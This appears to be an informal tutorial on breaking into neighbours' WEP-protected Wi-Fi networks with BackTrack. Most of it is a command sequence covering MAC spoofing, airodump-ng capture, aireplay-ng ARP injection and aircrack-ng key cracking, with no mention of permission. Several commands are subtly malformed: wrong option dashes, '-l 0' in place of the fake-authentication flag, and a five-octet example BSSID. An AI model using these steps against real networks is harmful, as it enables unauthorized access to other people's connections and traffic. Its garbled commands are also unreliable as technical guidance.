So, everyone knows about wireless connection / wifi around their neighbourhood. Some of them are not secured at all, in which make this tutorial useless. Read more if you want to understand how it worksOK, when u tried to connect to Wifi around your neighbourhood, some of them are security protected.
Types of wireless security found in router nowadays:
1. WEP [ Wired Equivalent Privacy ] – This is the weakest security that protect a wireless connection from being hacked by professional or amateur hacker.
2. WPA+PSK [ Wifi Protected Access + PreShared Key ] – This is currently the strongest security that can be applied to your wireless connection. Some said that these can be hacked, but require much time to accomplish.
So, basically this tutorial is going to teach you on how to hack Wifi connection with WEP protected. How to identify the security? easy, just hover to the wireless connection, and it will show you what kind of security it has.
In order to follow this tutorial, you must have at least backtrack 3 installed in your machine. You can get the latest backtrack version here [Latest version is Backtrack 4 Final Release]
Ok, this tutorial used backtrack 3 to accomplish the hacking session.
1. Open up a shell command, by clicking the little blackbox next to the start button
2. First thing to do is stop our wireless card, type this in the shell command
* airmon-ng stop wlan0 —> do check what is your wireless device by typing iwconfig in the shell command, in my case, my wireless device in wlan0.
* Now put the wireless card down to make a fake mac address
Type : ifconfig wlan0 down
* Now change the mac address
Type : macchanger -mac 00:11:22:33:44:55 wlan0
* Start the wireless card
Type : airmon-ng start wlan0
3. Now let’s start looking for AP [Access Point]
Type : airodump-ng wlan0
4. After you see the AP’s lists on the left side. Copy the BSSID or write down on a paper. Example : 00:1c:23:41:34
5. Open another shell
Type : airodump-ng -c 6 -w WIFIHACK -bssid 00:1c:23:41:34 wlan0
“take a look at data. If the number is keep going at the first time you use the airdump-ng, means you do not need to inject it with ARP. But if the number is very slowly increasing, you need to inject it with ARP”
6. Open another shell again, this time we are going to create more data with ARP Injection, so we don’t have to wait for the data to come to us, but we make it to come to us.
Type in the new shell : aireplay-ng -l 0 -a 00:1c:23:41:34 -h 00:11:22:33:44:55 wlan0
7. Inject the router in a new shell again
Type : aireplay-ng -3 -b 00:1c:23:41:34 -h 00:11:22:33:44:55 wlan0
8. Processes number 6 and 7 takes a while to actually inject. Check the data in process number 5, if the “data” is increasing rapidly means the injection is success.
9. Wait for the data to be around 100k and above, and you can start cracking the key
Type in new shell : aircrack-ng -n 64 -bssid 00:1c:23:41:34 WIFIHACK-01.cap
Once you crack it down, write the password down on a paper.
It will looks like this when it is cracked with aircrack : 11:CD:21:92:34
but when you type in the password, type: 11CD219234